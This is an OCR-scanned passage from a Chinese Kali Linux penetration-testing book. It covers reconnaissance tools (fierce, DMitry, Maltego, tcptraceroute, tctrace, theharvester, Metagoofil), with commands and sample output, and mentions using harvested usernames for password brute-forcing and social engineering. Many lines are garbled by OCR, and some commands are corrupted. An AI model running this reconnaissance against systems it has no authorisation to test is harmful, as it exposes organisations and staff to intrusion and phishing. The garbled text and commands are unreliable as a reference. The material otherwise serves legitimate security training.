Testing ns1.example.com 
Request timed out or transfer not allowed. 
Testing ns2.example.com 


Request timed out or transfer not allowed. 


Testing ns3.example.com 
Request timed out or transfer not allowed. 
Unsuccessful in zone transfer (it was worth a shot) 
Okay, trying the good old fashioned way... brute force 
Checking for wildcard DNS... 
Nope. Good. 
Now performing 1895 test(s)... 
192.168.116.3  voips.example.com 
192.168.116.7  ns.example.com 
192.168.116.19  streaming.example.com 
192.168.117.50 dev.example.com 
192.168.117.16  mx1.example.com 
192.168.117.17  mx2.example.com 
192.168.117.18 mx3.example.com 
192.168.117.16 imap.example.com 
192.168.117.5 www.example.com 
192.168.117.6  intra.example.com 
192.168.117.17 mail.example.com 
192.168.117.5 web.example.com 
192.168.117.16 webmail.example.com 
Subnets found (may want to probe here using nmap or unicornscan): 
192.168.73.0-255 : 2 hostnames found. 
192.168.46.0-255 : 1 hostnames found. 
192.168.116.0-255 : 34 hostnames found. 
192.168.117.0-255 : 25 hostnames found. 
Done with Fierce scan: http://ha.ckers.org/fierce/ 


Found 62 entries. 


Have a nice day. 

fierce 进 行 DNS 枚 举 的 耗 时 可 能 会 比较 长 。 

上 述 篇 幅 介 绍 了 搜索 某 个 域 的 主机 名 称 的 多 种 方法 。 您 可 能 会 对 
主机 名 的 作用 产生 疑问 。 在 渗透 测试 项 目 里 ， 只 要 能 够 在 DNS 分 析 阶 
段 找 到 主机 名 称 ， 束 可 以 对 该 主机 进行 测试 。 

4.3.6 DMitry 


DMitry (Deep Magic Information Gathering Tool) 属于 多 功能 的 信 
尽 收 集 工 具 。 它 收集 信息 的 主要 方式 可 分 为 : 

e 根据 IP 地 址 (或 域名 ) 来 查询 目标 主机 的 whois 信息 ; 

e 在 Netcraft.com 的 网 站 上 挖掘 主机 信息 

e 查找 目标 域 中 用 的 子 域 ; 

e 查找 目标 域 的 电子 邮件 地 址 ; 

e 探测 目标 主机 上 打开 的 端口 、 被 屏蔽 的 端口 和 关闭 的 端口 。 

尽管 Kali Linux 中 的 很 多 工具 都 可 以 部 分 获取 这 些 信息 ， 但 十 
DMitry 更 为 方便 。 它 整合 了 这 些 工 具 ， 能 够 在 同一 个 报告 里 记录 多 种 
工具 才能 获取 到 的 所 有 信息 。 

实际 上 DMitry 不 仅 具 有 DNS 分 析 功 能 ， 还 有 路 由 分 析 功 能 。 但 
是 我 们 认为 这 个 工具 更 侧重 与 DNS 分 析 ， 所 以 把 它 归 到 了 DNS 类 工 
Ho 

如 需 通过 图 形 界 面 启动 DMitry ， 可 通过 菜单 依次 选中 
Applications|KaliLinux|Information Gathering | OSINTAnalysis | dmitry ° 
您 也 可 以 在 终端 窗口 里 通过 下 述 指 令 局 动 它 。 


# dmitry 
本 例 将 使 用 DMitry 程 序 依 次 完成 下 述 任务 : 
e 进行 whois 查询 |; 


e 从 Netcraft.com 的 网 站 上 收集 相关 信息 ; 


e 搜索 所 有 可 能 的 子 域 ; 

e 搜索 所 有 可 能 的 电子 邮件 地 址 。 

下 面 这 个 指令 即 可 完成 全 部 上 述 功 能 。 

# dmitry -iwnse targethost 

该 指令 的 返回 结果 如 下 。 

Deepmagic Information Gathering Tool 

"There be some deep magic going on" 
HostIP:192.168.xx.xx 

HostName:targethost 

Gathered Netcraft information for targethost 
Retrieving Netcraft.com information for targethost 
No uptime reports available for host: targethost 
Gathered Subdomain information for targethost 
Searching Google.com:80... 
HostName:targethost 

HostIP:192.168.xx.xx 
HostName:www.ecom.targethost 
HostIP:192.168.xx.xx 
HostName:blogs.targethost 
HostIP:192.168.xx.xx 
HostName:static.targethost 
HostIP:192.168.xx.xx 
HostName:webmail.targethost 
HostIP:192.168.xx.xx 


Gathered E-Mail information for targethost 
Found 0 E-Mail(s) for host targethost, Searched 0 pages containing 0 
results 
DMitry 程 序 还 可 以 作 简 单 的 端口 扫描 ， 所 需 指令 如 下 。 
# dmitry -p targethost -f -b 
扫描 结果 如 下 。 
Deepmagic Information Gathering Tool 
"There be some deep magic going on" 
HostIP:192.168.xx.xx 
HostName:targethost 
Gathered TCP Port information for 192.168.xx.xx 
Port State 


80/tcp open 


135/tcp filtered 

136/tcp filtered 

137/tcp filtered 

138/tcp filtered 

139/tcp filtered 

Portscan Finished: Scanned 150 ports, 138 ports were in state closed 

从 上 述 的 扫描 结果 可 以 看 出 ，targethost EH T EMALIA ° 
它 只 人 允许 连接 到 该 主机 的 80 端 口 ， 这 个 端口 通 遂 由 Web 服 务 古 占用 。 


4.3.7 Maltego 


Maltego 是 开源 的 情报 收集 程序 和 法 证 调查 程序 。 它 能 够 以 一 种 人 
性 化 的 方式 挖掘 、 收 集 并 整理 信息 。Maltego 的 开源 意味 着 它 从 公开 的 
资源 里 收集 信息 。 在 收集 信息 之 后 ， 您 可 使 用 Maltego 标 注 各 种 信息 之 
间 的 天 联 。 

Maltego 能 够 以 图 形 化 的 方式 显示 数据 之 间 的 关联 。 在 分 析 信 息 上 请 
段 各 方面 的 共同 性 时 ， 这 种 可 视 化 功能 可 使 工作 变 得 简单 。 

Maltego 可 以 收集 以 下 几 种 网 络 信息 : 

e 域名 ; 

e DNS 名 ; 

e whois (F; 

e EZ ; 

e IP 地 址 。 

它 还 可 以 用 来 收集 与 人 有 天 的 信息 ， 例 如 ; 

e 某 人 所 在 公司 或 所 在 组 织 ; 

e 与 某 人 有 关 的 E-mail 地 址 ; 

e 与 某 人 有 天 的 网 站 |; 

e 与 某 人 有 关 的 社交 网 站 ; 

e 与 某 人 有 关 的 电话 号 码 。 

Kali Linux 目 市 的 Maltego 应 当 是 Maltego 3.3.0 Kali Linux 版 。 这 属 
于 社区 版 本 ， 它 存在 一 些 功能 上 的 限制 。 详 细 的 限制 可 参见 
http:/www.paterva.com/web5/clienVycommunityphp。 人 简 而 言 之 ， 这 种 版 
本 限制 分 为 : 

e 不 可 用 于 商业 用 途 ; 

e 每 次 转换 (transform) 最 多 返回 转换 结果 中 的 12 项 ; 

e 用 户 需 要 移 在 官方 网 站 上 注册 ， 才 能 使 用 客户 端 程序 ; 

e API key SCH IM ARK; 

e 它 与 社区 版 的 其 他 用 户 共享 一 台 性 能 并 不 出 色 的 服务 器 ; 


e 客户 端 和 服务 器 端的 通信 和 是 不 加 密 的 

e 只 能 升级 到 主要 发 行 版 ; 

e 没有 客户 文 持 ; 

e 服务 器 端的 转换 功能 不 会 更 新 。 

Maltego 具 有 70 多 种 转换 功能 。 所 谓 转换 (transform) 就 是 信息 收 
集 的 一 个 阶段 。Maltego 每 做 一 次 转换 丈 是 在 做 一 个 阶段 的 信息 收集 工 
作 。 

如 需 使 用 Maltego ， 可 在 图 形 染 单 里 依次 选中 Kali Linux | 
Information Gathering |OSINTAnalysis | maltego， 或 者 在 终端 中 使 用 下 述 
TH © 

# maltego 

而 后 您 将 看 到 它 的 欢迎 信息 ( 见 图 4.4) 。 数 秒 钟 之 后 ， 程 序 会 启 
动 Maltego 设 置 向 导 ， 以 帮助 您 在 第 一 次 运行 它 的 时 候 进 行 客户 端 设 
He 


Welcome to Maltego! 


Steps Startup wizard - Welcome (1 of 5) 


. Welcome 
Login Welcome to Maltego! 
Login result 
Selecttransform seeds This wizard will guide you through the steps of setting up your 
Update transforms Maltego Client for first use 


We hope that you enjoy using our product as much as we enjoy 
building it! 


Please note that the Community Edition is intended for 
non-commercial use only! 
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图 4.4 
点 击 Next 后 进入 图 4.5 所 示 的 界面 。 


Welcome to Maltegol 


Steps Startup wizard - Login (2 of 5) 


Enter your details below to log in to the Maltego Community Server 


Welcome 
， Login Or if you have not done so yet, register here 

Login result z d 

Select transform seeds 

Update transforms Login 

nfi * Email Address 


Password 


once 


* Solve captcha 
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Cancel 


图 4.5 
此 时 您 需要 输入 登录 Maltego 社 区 的 账号 信息 。 如 果 您 没有 社区 账 
号 ， 可 点 击 register here 链 接 ， 在 官方 网 站 上 进行 注册 。 
注册 页 面 如 图 4.6 所 示 。 


fà: ? paterva.com/ t te £ «e Biv q ^ p 
| 


Welcome to the Maltego version 3 community edition page, nere you will be able to register an account that you can use with the NEW community edition! 


Register 


Register an account today for free! 


Firstname 


| Lastname 


Organisation 


Email Address 
| Password 


Password Contirmation 


Captcha 


图 4.6 
在 空白 处 填写 相关 信息 之 后 ， 点 击 Register! 按钮 完成 注册 。 
如 果 您 有 Maltego 账 号 ， 在 程序 里 输入 正确 的 登录 信息 就 可 进入 图 
4.7 所 示 的 界面 。 


Welcome to Maltego! 


Startup wizard - Login result (3 of 5) 


Logir Hello Tedi, welcome to Maltego Community Edition! 
Login result 

Select transform seeds Personal details 

Update transforms 


First name 
Surname 


Email address 


Your API key is valid until May 22, 2013 at 12:00:00 AM WIT 
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图 4.7 
接 下 来 要 设置 Maltego 转 换 的 种 子 (seed) ， 如 图 4.8 所 示 。 


Welcome to Maltego! 


Startup wizard - Select transform seeds (4 of 5) 


Login Discover transforms from 
Login result 
. Select transform seeds v | Maltego public servers 


Update transforms 
T Local TAS (Transform Application Server) 


Note: The transform seed settings can be changed later through 
Manage-»Discover Transforms 
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<Back] Crea] 
图 4.8 
此 后 Maltego 客 户 端 程序 会 连接 Maltego 服 务 器 ， 以 获取 转换 所 需 的 
信息 。 如 果 上 壕 设 置 都 设置 正确 ， 您 将 看 到 图 4.9 所 示 的 界面 。 


Welcome to Maltego! 


Steps Startup wizard - Update transforms (5 of 5) 


Login Ready...Set...GO! 

Login result 

Select transform seeds Your new Maltego client has been initialized sucessfully! 
Update transforms 


2 new application server(s) were found 
48 new transforms were found 


51 new entities were installed 


You are now ready to use Maltego! 
€) Run a machine (NEWI!) 
) Open a blank graph and let me play around 
Open an example graph 
Go away, | have done this before! 
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图 4.9 
如 果 出 现 了 上 述 界 面 ， 就 说 明 Maltego 成 功 完成 了 初始 化 操作 。 您 
现在 就 可 以 使 用 Maltego 客 户 端 程序 。 
在 介绍 Maltego 的 各 种 使 用 方法 之 前 ， 我 们 先 熟 悉 一 下 程序 的 界面 
( 见 图 4.10) ° 


Bubble View — Entity List 


€» infrastructure 
€» Locations 


€» Penetration .. 


© Social Netw... 


图 4.10 

程序 窗口 的 左上 角 是 Palette (控制 面板 ) 窗口 。 您 可 以 在 这 个 窗 
口 里 选择 不 同 实 体 (entity) 类 型 的 对 象 目标 。Maltego 的 实体 类 型 分 为 
6 组 。 

eX (Device) : 例如 电话 、 照 相机 。 

e 基础 设施 (Infrastructure) : 例如 AS ` DNS 名 称 、 域 名 、IPv4 
HHE ` MX 记录 、NS 记 录 、 网 段 、URL 和 网 站 。 

o 地 点 (Locations) : 例如 地 球 。 

e 渗透 测试 (Penetration testing) : 采用 各 种 技术 的 测试 项 目 。 

e 个 人 (Personal) : 别名 、 文 件 、E-mail 地 址 、 图 像 、 人 物 、 电 
话 号 他 和 短语 。 

e 社交 网 络 (Social Network) : 包括 Facebook 和 Twitter 实体 、 好 

图 4.10 顶 部 的 中 间 部 分 ， 分 别 是 Main View ( 主 视图 ) ` Bubble 
View (气泡 图 ) 和 Entity List (实体 清单 ) 。 分 析 人 员 应 该 在 大 图 里 标 
注 数据 之 间 的 各 种 关系 ， 而 他 们 可 在 这 三 种 视图 里 得 看 那些 在 大 图 中 
不 明显 的 信息 。Main View 是 常规 工作 视图 ，Bubble ViewTEfzi s T 53 
示 为 气泡 ， 而 Entity List 则 把 节点 显示 为 文本 。 

在 视图 旁边 的 几 个 图 表 分 别人 代表 不 同 的 布局 算法 (layout 
algorithm) ° Maltego 支持 4 种 布局 算法 。 

e 块 状 布局 (Block layout) : 信息 挖掘 的 默认 布局 。 

e 分 层 布局 (Hierarchical layout) : 类 似 文件 管理 器 的 树 状 布局 。 

e 中 心 布局 (Centrality layout) : 靠近 中 心 的 节点 围绕 中 心 进行 分 
布 ， 其 他 市 点 分 散在 四 周 。 

e 紧凑 布局 (Organic layout) : 节点 分 布 距离 尽量 紧 炭 ， 每 个 节点 
与 其 他 市 点 之 间 的 距离 尽量 保持 最 短 。 

熟悉 过 程序 界面 之 后 ， 我 们 开始 演示 它 的 功能 。 


本 文 以 example.com 为 例 ， 演 示 收 集 某 个 域 的 信息 的 具体 方法 。 

我 们 首先 使 用 快捷 键 (Cul-T) 创建 新 的 工作 图 (graph) 。 在 
Palette 标 签 里 选 Infrastructure， 然 后 点 击 Domain ° $E] 25 di R Bl] E fd 
口 。 如 果 操 作成 功 ， 您 将 在 主 窗口 里 看 到 名 为 paterva.com 的 域 对 象 。 
双击 这 个 名 称 ， 把 它 重新 命名 为 目标 域 ， 在 本 例 中 ， 我 们 给 它 重 命名 


为 example.com ° 
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in 
election $$ Select None e Select Parents fe Add Parent Yt Select Bookmarked ` = 
[æ] Palette — « x xj New Graph 1)* x 
9 Devices MIE MainView | Bubble view Entity List 
Device - 
ea 
9 Infrastruc... 
AS 
An internet A 


a 


rm. MX Record 

A DNS mail ei 1 
pg, NS Record 

A ONS name 


«a Netblock 
bed An internet A 


图 4.11 

右键 点 击 这 个 域名 ， 可 看 到 可 以 应 用 的 转换 操作 ; 

e DNS from domain 《获取 DNS 信息 ) ; 

e Domain owner's details ( 域 注册 人 信息 ) ; 

e E-mail addresses from domain (E-mail 地 址 ) ; 

e Other transforms (其 他 转换 ， 包 括 To Person ^ To Phone 
numbers ^ To Website) ; 

e Files and documents from domain (文档 操作 ) ; 

e All transforms (查看 所 有 转换 ) 。 


我 们 在 菜单 里 选中 Run Transform | Other Transforms | Domain To 
DNS NameSchema， 转 换 结 来 如 图 4.12 所 示 。 
进行 DNS from domain 转 换 后 ， 可 收集 网 站 地 址 和 该 域 有 天 的 DNS 


您 还 可 以 进行 其 他 转换 。 

如 有 果 您 要 更 改 测试 对 象 为 其 他 域 ， 应 当 保 存 当 前 工作 图 。 保 存 工 
作 图 的 具体 方法 是 ， 操 击 Maltego 图 标 ， 然 后 选择 Save。 工作 图 将 被 以 
Maltego 工 作 图 的 格式 保存 为 .mtgx 文 件 。 然 后 ， 可 双击 现 有 的 域 对 象 ， 
更 改 域名 。 


^3 Start Page x |Ñ New Graph (1)* x 


Main View Bubble View Entity List 


Using Schema http://tastools.paterva.com/bfdns/aaastandard.bfdns 
) en 


INSNameSchema returned with 1 entities 
e 


图 4.12 
下 一 节 将 介绍 几 个 收集 路 由 信息 的 程序 。 
4.4 路 由 信息 


获取 网 络 路 由 信息 的 工具 各 种 各 样 ， 本 半 将 介绍 几 种 常用 工具 。 
网 络 路 由 信息 可 以 帮助 测试 人 员 了 解 目 己 的 主机 到 目标 主机 之 间 的 网 
络 通信 路 径 ， 进 而 理解 目标 主机 的 网 络 情况 。 保 护 目标 主机 的 防 淡 场 
信息 ， 往 往 也 暗藏 于 路 由 信息 里 。 


本 万 将 介绍 几 球 用 于 获取 路 由 信息 的 工具 。 
4.4.1 tcptraceroute 


tcptraceroute 是 traceroute 程 序 的 补充 工具 。 传 统 的 traceroute 程 序 在 
其 发 送 的 UDP 或 ICMP echo 数据 包 里 ， 设 置 有 特定 的 TTL (Time To 
Live) 标志 位 。 它 把 TTL 的 值 从 1 开始 递增 ， 直 到 数据 包 到 达 目 标 主 机 
为 止 。 ent ete 是 使 用 TCP 数 据 包 进行 测试 ， 它 利用 TCP SYN 

(握手 请 求 ) 数据 包 进 行路 由 信息 探测 。 

相 比 其 他 程序 ，tcptraceroute 的 优点 在 于 其 较 高 的 通过 率 。 如 果 在 

透 测试 人 员 和 目标 主机 之 间 的 防火 墙 葵 止 traceroute 数 据 通 过 ， 那 么 
ee AU UA AEA TEH ° (eR EET Is A] BE 
机 的 特定 TCP 端 口 ， 就 可 以 使 用 tcptraceroute 程 序 穿 过 防火 墙 到 测试 目 
标 主机 。 

在 使 用 tcptraceroute 时 ， 如 果 相 应 的 目标 端口 是 开放 的 (open) , 
程序 将 会 收 到 SYNVACK 数 据 包 ;而 如 果 目 标 端口 是 关闭 的 ， 那 么 它 会 
收 到 一 个 RST 数 据 包 。 

要 使 用 tcptraceroute， 只 需 在 终端 里 使 用 下 述 指令 。 

# tcptracaroute 

这 条 指令 会 在 屏幕 上 提示 tcptraceroute 的 使 用 方法 。 

现在 我 们 来 演示 它 的 用 法 。 

我 们 使 用 下 述 指 令 以 获取 本 机 与 example.com 主 机 之 间 的 路 由 信 
已 o 


# traceroute www.example.com 
该 指令 的 返回 结 采 如 下 。 
traceroute to www.example.com (192.168.10.100), 30 hops max, 40 
byte packets 
1 192.168.1.1 (192.168.1.1) 8.382 ms 12.681 ms 24.169 ms 


2 1.static.192.168.xx.xx.isp (192.168.2.1) 47.276 ms 61.215 ms 
61.057 ms 

3 k k >k 

4 74.subnet192.168.xx.xx.isp (192.168.4.1) 68.794 ms 76.895 ms 
94.154 ms 

5 isp2 (192.168.5.1) 122.919 ms 124.968 ms 132.380 ms 


15 * * * 


30 * * k 
TESBIS MARZ, MAERA REEM ER EH fei T. o Re 
因为 traceroute iE EJ: P] 28 E AY BASE T Y Fe ic To 
下 面 我们 来 使 用 tcptraceroute。 假如 我 们 事先 知道 目标 主机 为 Web 
服务 器 开放 了 TCP 协 议 的 80 端 口 ， 那 么 就 可 以 使 用 下 述 指令 。 
# tcptraceroute www.example.com 
返回 的 结果 如 下 。 
Selected device eth0, address 192.168.1.107, port 41884 for outgoing 
packets 
Tracing the path to www.example.com (192.168.10.100) on TCP port 
80 
(www), 30 hops max 
1 192.168.1.1 55.332 ms 6.087 ms 3.256 ms 
2 1.static.192.168.xx.xx.isp (192.168.2.1) 66.497 ms 50.436 
ms 85.326 ms 
QR k 
4 74.subnet192.168.xx.xx.isp (192.168.4.1) 56.252 ms 28.041 ms 
34.607 ms 


5 isp2 (192.168.5.1) 51.160 ms 54.382 ms 150.168 ms 
6 192.168.6.1 106.216 ms 105.319 ms 130.462 ms 
7 192.168.7.1 140.752 ms 254.555 ms 106.610 ms 


14 192.168.14.1 453.829 ms 404.907 ms 420.745 ms 

15 192.168.15.1 615.886 ms 474.649 ms 432.609 ms 

16 192.168.16.1 [open] 521.673 ms 474.778 ms 820.607 ms 

这 一 次 ， 我 们 的 数据 包 成 功 到 达 了 目标 主机 ， 并 且 给 出 了 测试 机 
与 目标 主机 之 间 的 完整 路 由 信息 。 


4.4.2 tctrace 


我 们 同样 可 以 选用 tctrace 程序 分 析 路 由 信息 。 这 个 程序 通过 向 目 
标 主 机 发 送 TCP SYN 数 据 包 来 获取 相应 信息 。 
如 需 使 用 tctrace 程 序 ， 可 在 终端 中 使 用 下 述 指令 。 
# tctrace -i<device> -d<targethost> 
参数 中 的 <device> 指 的 是 网 卡 接口 ，<targethost> 则 是 被 测试 的 目标 
EDL ° 
例如 ， 我 们 可 以 使 用 下 述 指 令 获 取 本 机 和 www.example.com 之 间 的 
路 由 信息 。 
# tctrace -i ethO -d www.example.com 
该 指令 的 返回 结果 如 下 。 
1(1) [192.168.1.1] 
2(1) [192.168.2.1] 
3(all) Timeout 
4(3) [192.168.4.1] 
5(1) [192.168.5.1] 
6(1) [192.168.6.1] 


7(1) [192.168.7.1] 


14(1) [192.168.14.1] 
15(1) [192.168.15.1] 
16(1) [192.168.16.1] (reached; open) 


4.5 搜索 引擎 


Kali Linux 中 的 搜索 引擎 类 工具 可 以 使 用 搜索 引擎 获取 目标 主机 的 
域名 信息 、 电 子 邮 件 信息 ， 以 及 文件 的 元 数据 (metadata) 信息 。 这 些 
工具 被 动 收 集 的 工作 方式 也 正 是 它们 的 优势 所 在 。 如 采 您 无 法 访问 目 
标 主机 上 的 网 站 ， 不 妨 利用 搜索 引擎 间接 访问 。 吏 其 结 采 而 言 ， 目 标 
主机 不 会 知道 您 具体 进行 了 哪些 操作 。 


4.5.1 theharvester 


theharvester 能 够 收集 电子 邮件 帐号、 用 户 名 和 主机 名 / 子 域名 信 
息 。 它 通过 数 个 公共 资源 搜索 所 需 的 信息 。2.2 版 theharvester 用 到 的 公 
资源 如 下 所 示 。 
e 谷歌 (Google) 
e AN. (Bing) 
e PGP 


e Linkedin 


e Yandex 

e People123 

e Jigsaw 

e Shodan 

如 需 在 Kali Linux 中 使 用 theharvester， 可 在 终端 中 使 用 如 下 指令 。 


4 theharvester 


程序 会 在 屏幕 上 提示 该 工具 的 使 用 方法 。 

例如 ， 如 有 果 想 从 谷歌 的 前 100 项 搜索 结果 里 控 据 目标 域 里 的 电子 
邮件 地 址 和 主机 名 ， 可 使 用 下 述 指令 。 

# theharvester -d example.com -1 100 -b google 

程序 搜索 到 的 E-mail 地 址 和 主机 名 如 下 。 

[-] Searching in Google: 

Searching 0 results... 

[+] Emails found: 

info(Dexample.com 

user1@example.com 

user2@example.com 

user3@example.com 

[+] Hosts found in search engines: 

192.168.118.14:sd1.example.com 

192.168.118.14:sd2.example.com 

192.168.118.14:event.example.com 

192.168.118.14:test.example.com 

203.34.118.7:nms.example.com 

上 述 结 果 里 含有 多 个 E-mail 地 址 和 数 个 主机 名 ， 这 都 是 theharvester 

通过 Google 搜 索引 擎 收集 到 的 信息 。 

如 果 需 要 收集 其 他 信息 ， 例 如 用 户 名 等 信息 ， 我 们 可 以 指定 程序 
使 用 linkedin.com。 具 体 指 令 如 下 。 

# theharvester -d example.com -1 100 -b linkedin 

该 指令 的 返回 结 采 如 下 。 

[-] Searching in Linkedin.. 


Searching 100 results.. 

Users from Linkedin: 

user1 

user2 

user3 

user4 

users 

user6 

Total results: 6 

从 Linkedin.com 网 站 上 搜索 到 的 目标 域 的 用 户 名 ， 将 在 后 期 的 渗透 
测试 阶段 发 挥 作用 。 如 果 测 试 人 员 要 发 起 社会 工程 学 攻击 之 类 的 渗 


透 ， 就 会 需要 这 些 信 息 。 


4.5.2 Metagoofil 


Metagoofil 通 过 合 歌 引 获 搜索 目标 域 的 文件 的 元 数据 信息 
(metadata) 。 目 前 ， 它 支持 的 文件 格式 有 : 

e Word 文档 (.docx、.doc) ; 

e 表格 文件 (xlsx ^ xls ^ .ods) ; 

e 演示 文档 Cpptx^.ppt^.odp) ; 

e PDF 文件 (pdf) ° 

在 获取 元 数据 信息 时 ，Metagoofil 的 内 部 操作 过 程 大 体 如 下 : 

e 使 用 Google 引擎 在 目标 域内 搜索 指定 的 文件 类 型 ; 

e 把 搜索 到 的 文档 保存 到 本 地 磁盘 ; 

e 从 下 载 的 文件 中 解析 元 数据 信息 ; 

e 把 元 数据 信息 的 分 析 结 果 保 存 为 HTML 文件 。 

我 们 可 以 在 元 数据 信息 里 找到 的 信息 有 : 

e HEP; 


e 软件 版 本 ; 

e 服务 嫩 名 或 机 器 名 。 

渗透 测试 的 后 期 阶段 可 能 会 用 到 这 些 信息 。 

要 访问 Metagoofil， 在 终端 中 执行 如 下 命令 : 

# metagoofil 

这 将 显示 该 命令 的 使 用 方法 和 示例 。 

我 们 通过 一 个 例子 进行 详细 的 用 法 说 明 。 现 在 ,我们 要 从 日 标 域 

(-d example.com) 里 搜索 DOC 文件 和 PDF 文件 (-t .doc, .ipdf) ， 并 保 
存 到 test 目录 里 (-otest) 。 对 于 每 种 类 型 的 文件 ， 我 们 都 要 收集 20 个 
(420) 。 我 们 希望 这 个 程序 只 下 载 5 个 文件 (-n5) ， 并 将 最 终 处 理 

结果 保存 为 test.html (-ftesthtml) 。 结 合 以 上 参数 ， 我 们 应 当 使 用 的 指 
Ud pe 

# metagoofil -d example.com -| 20 -t doc,pdf —n 5 -f test.html -o test 

该 指令 的 返回 结果 如 下 。 

[-] Starting online search... 

[-] Searching for doc files, with a limit of 200 

Searching 100 results... 
Searching 200 results... 

Results: 191 files found 

Starting to download 5 of them: 

[1/5] /support/websearch/bin/answer.py ?answer-186645 & amp;9620 

form-bb& amp;hl-en 

Error downloading /support/websearch/bin/answer. 

py?answer-186645 & amp;9620form-bb & amp;hl-en 

[2/5] http://www.example.com/documents/customerevidence/27402_ 

Cakewalk final.do 


[3/5] http:// www.example.com/documents/customerevidence/5588 _ 
marksspencer.doc 
[4/5] http:// www.example.com/documents/uk/Ladbrokes.doc 
[5/5] http:// www.example.com/~ Gray/papers/PITAC Interim Report 
8 98.doc 
[-] Searching for pdf files, with a limit of 200 
Searching 100 results... 
Searching 200 results... 
Results: 202 files found 
Starting to download 5 of them: 
[1/5] /support/websearch/bin/answer.py?answer=186645 & amp;9620 
form-bb& amp;hl-en 
Error downloading /support/websearch/bin/answer. 
py?answer-186645 & amp;9620form-bb & amp;hl-en 
[2/5] http:// www.example.com/pubs/77954/s1021801.pdf 
[3/5] http:// www.example.com/pubs/152133/deepconvexnetwork 
interspeech2011-pub.pdf 
[x] Error in the parsing process 
[4/5] http:// www.example.com/en-us/collaboration/papers/uruguay.pdf 
[5/5] http:// www.example.com/pubs/63611/2002-droppo-icslpb. pdf 
[+] List of users found: 
Benjamin Van Houten 
Marketing 
IT 
May Yee 


sarah condon 

clarel 

Jim Gray 

[+] List of software found: 

Microsoft Office Word 

Microsoft Word 10.0 

Microsoft Word 9.0 

Microsoft Word 8.0 

Acrobat Distiller 5.0.5 (Windows) 

Adobe PDF Library 8.0 

Adobe InDesign CS3 (5.0.2) 

[+] List of paths and servers found: 

'Macintosh HD: Temporary Items: AutoRecovery save of Congressio' 

'NCO Server:Staff (NCO Staff): Yolanda Comedy:IR22July:IR10Aug' 

'C:jimHPCCOWPACIT . Report. 8 98.doc' 

[+] List of e-mails found: 

gzweig@mail.example.com 

程序 找到 了 很 多 文件 ， 并 从 中 收集 到 了 大 量 诸如 用 户 名 和 文件 路 
径 的 信息 。 我 们 可 以 通过 这 些 用 户 名 穷 举目 标 域 里 的 用 户 名 ， 进 而 使 
用 字典 暴力 破解 〈 在 目标 域 中 存在 的 ) 用 户 名 的 密码 。 需 要 小 心 的 
是 ， 如 条 对 目标 域 里 的 用 户 名 进行 又 力 破 解 ， 可 能 会 造成 账号 锁定 的 
情况 。 此 外 ， 我 们 可 以 根据 路 径 信息 推测 目标 主机 的 操作 系统 。 可 
见 ， 我 们 完全 可 以 在 不 直接 访问 目标 域 的 网 址 的 情况 下 获取 上 述 信 
is 


o 


Metagoofil 能 够 以 报告 格式 生成 汇总 信息 。 例 如 ， 若 把 报告 文件 储 
FEJ HTML 格式 文件 ， 我 们 可 看 到 图 4.13 所 示 的 内 容 。 


Ea 
ELT IEEE JE 35 ns si 
Usernames || Software || Emails || Paths/Servers | 


User names found: 


Benjamin Van Houten 
Marketing 

IT 

May Yee 

sarah condon 

clarel 

Jim Gray 


Software versions found: 


Microsoft Office Word 

Microsoft Word 10.0 

Microsoft Word 9.0 

Microsoft Word 8.0 

Acrobat Distiller 5.0.5 (Windows) 
Causal Productions Pty Ltd 
Adobe PDF Library 8.0 

Adobe InDesign CS3 (5.0.2) 


图 4.13 
这 个 报告 舍 有 目标 域 的 用 户 名 、 软 件 版 本 、E-mail 地 址 和 服务 辟 信 


4.6 总 结 


本 章 介 绍 了 信息 收集 阶段 的 渗透 测试 工作 。 这 个 阶段 的 工作 通常 
是 活 透 测试 里 最 移 进行 的 工作 。 在 这 个 阶段 ， 我 们 要 尽 可 能 地 收集 目 
标 组 织 的 信息 。 越 是 了 解 测 试 目标 ， 测 试 的 工作 就 越 是 容易 。 著 名 的 

《孙子 兵法 》 认 为 : 

AEA, Aik AHE 

这 人 句 话 揭示 了 渗透 测试 领域 的 奥秘 。 

本 章 介绍 了 Kali Linux 里 的 信息 收集 工具 。 本 章 首先 介绍 了 通过 公 
开 网 站 收集 目标 单位 信息 的 方法 ， 而 后 介绍 了 使 用 软件 获取 域 注册 信 
居 的 方法 ， 还 介绍 了 可 收集 路 由 信息 的 工具 ， 以 及 利用 搜索 引 敬 来 收 
集 信息 的 工具 。 

下 一 章 我 们 将 介绍 目标 识别 。 


5 未 识别 


Kali Linux 的 很 多 工具 都 可 用 于 在 目标 网 络 里 发 现 、 识 别 主 机 。 本 
章 将 介绍 这 些 软件 的 使 用 方法 。 这 部 分 内 容 分 为 以 下 几 个 主题 ; 

e 目标 识别 过 程 的 简介 ; 

e 使 用 Kali Linux 的 工具 识别 目标 主机 的 方法 ; 

e 鉴定 目标 主机 操作 系统 的 方法 (操作 系统 指纹 识别 ) 。 

为 了 更 容易 地 理解 这 些 概念 ， 我 们 将 使 用 一 个 虚拟 网 络 作为 目标 
网 络 。 


5.1 简介 


在 利用 第 三 方 工具 (如 搜索 引 苟 ) 获取 目标 网 络 的 信息 之 后 ， 接 
下 来 瓯 要 识别 出 目标 系统 里 联网 的 主机 。 这 阶段 的 主要 目标 如 下 。 

e 在 目标 网 络 里 搜索 在 线 的 主机 。 如 有 果菜 台 主 机 不 在 线 ， 我 们 就 无 
法 对 其 进行 渗透 测试 ， 此 时 就 需要 另 找 一 台 在 线 的 主机 进行 渗透 测 
i? 

e 鉴定 目标 机 器 上 安装 的 操作 系统 。 

获取 这 些 信 息 有 助 于 后 期 漏洞 映射 阶段 的 工作 。 

我 们 使 用 Kali linux 系统 里 的 工具 进行 目标 识别 。 时 面 菜单 中 的 
Information Gathering 收 录 了 绝 大 多 数 的 目标 识别 工具 。 本 文 只 需要 关 
注 其 下 的 两 个 子 表单 里 的 程序 : 

e Identify Live Hosts (识别 在 线 主 机 ) ; 

e OS Fingerprinting (识别 操作 系统 ) ° 

本 章 从 这 两 个 类 别 的 诸多 程序 中 依照 其 功能 、 认 可 度 、 开 发 活跃 
度 ， 选 择 性 地 介绍 、 演 示 几 款 工 具 。 


5.2 识别 目标 主机 


T 3€ Identify Live Hosts 下 的 工具 可 用 于 判断 目标 主机 是 否 可 被 测 
试 人 员 访 问 。 在 开展 识别 阶段 的 工作 之 前 ， 我 们 需要 仔细 查看 我 们 与 
客户 达成 的 协议 和 服务 条 款 。 如 果 服 务 协议 要 求 我 们 隐匿 渗透 测试 的 
行为 ， 我 们 就 要 进行 相应 的 隐藏 测试 。 另 外 ， 在 测试 入 侵 监 测 系统 和 
